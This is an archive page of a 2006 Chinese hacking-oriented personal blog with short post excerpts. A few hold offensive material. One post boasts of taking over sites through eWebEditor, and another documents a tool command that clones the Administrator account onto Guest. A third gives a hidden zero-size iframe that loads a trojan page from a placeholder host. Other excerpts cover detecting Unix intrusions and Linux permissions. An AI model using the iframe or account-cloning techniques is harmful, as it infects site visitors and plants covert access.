2006年06月的文章

eWebEditor:网站中的隐形炸弹

站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!

漏洞利用

» 阅读全文

一些朋友们

见到一些朋友们哈
农民,农妇,自在轮回,心灵港湾,孤独坏坏
哈哈,都是一群坏蛋呢
Y的,一个比一个坏,就没发现一个好的
坏坏还是老样子,真是个神哈,今天他有了新的名字,哈哈,叫作“墨迹神”,哈哈哈哈
Y的太……
脚痛得厉害,不写了
……

All In One(AIO) V1.0

这是一个将很多小工具功能集成一体的一个"工具".

(如果你使用的是Build 04/01/2006版本,那版本中的syn扫描因编译时原因有些问题,请更新为Build 06/10/2006版本)

功能:
1.AutoRun             -> 查看一般登陆后启动的项
用法:Aio.exe -AutoRun

2.Clone               -> 克隆帐户
用法: Aio.exe -Clone 正常帐号 要被克隆帐户 密码
例子: Aio.exe -Clone Administrator Guest test
帮助: Aio.exe -Clone
不需要在system权限下也可用

» 阅读全文

正确的4种挂马方式(属于比较简单的)

一、最简单的也是最有效的

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

二、js挂马

» 阅读全文

离开

离开,
回家了,
这几天要回家一趟
不能上网了哦,
我的朋友们,N天后再见哈!
..........................
小静也要考试了,哈
..........................
看大家都比较忙的,就我一个人在这无聊的写着log


检测Unix是否被入侵最快捷的方法

鉴别Unix系统是否被入侵,需要较高的技巧,当然也有一些非常简单的方法。

  简单的方法就是检查系统日志、进程表和文件系统,查看是否存在一些“奇怪的”消息、进程或者文件。例如:

  两个运行的inetd进程(应该只有一个);

  .ssh以root的EUID运行而不是以root的UID运行;

  在“/”下的RPC服务的核心文件;

  新的setuid/setgid程序;

  大小迅速增长的文件;

» 阅读全文

解读Linux文件权限的设置方法

Windows系统其实和Linux系统有相似的地方,Windows系统文件、目录的属性有只读、隐藏,而Linux也一样。
  Linux中,每一个文件都具有特定的属性。主要包括文件类型和文件权限两个方面。可以分为5种不同的类型:普通文件、目录文件、链接文件、设备文件和管道文件。
   所谓的文件权限,是指对文件的访问权限,包括对文件的读、写、删除、执行。Linux 是一个多用户操作系统,它允许多个用户同时登录和工作。因此 Linux 将一个文件或目录与一个用户或组联系起来。访问控制列表(ACL:Access Control List)为计算机提供更好的访问控制,它的作用是限制包括root用户在内的所有用户对文件、资源或者套接字的访问。下面就来教大家简单的设置方法。
  步骤1 检查系统核心
  首先检查你的Linux系统

» 阅读全文

出售两上一直没用上的域名

出售两个域名,价格面议!

» 阅读全文

Total: 18123Next ›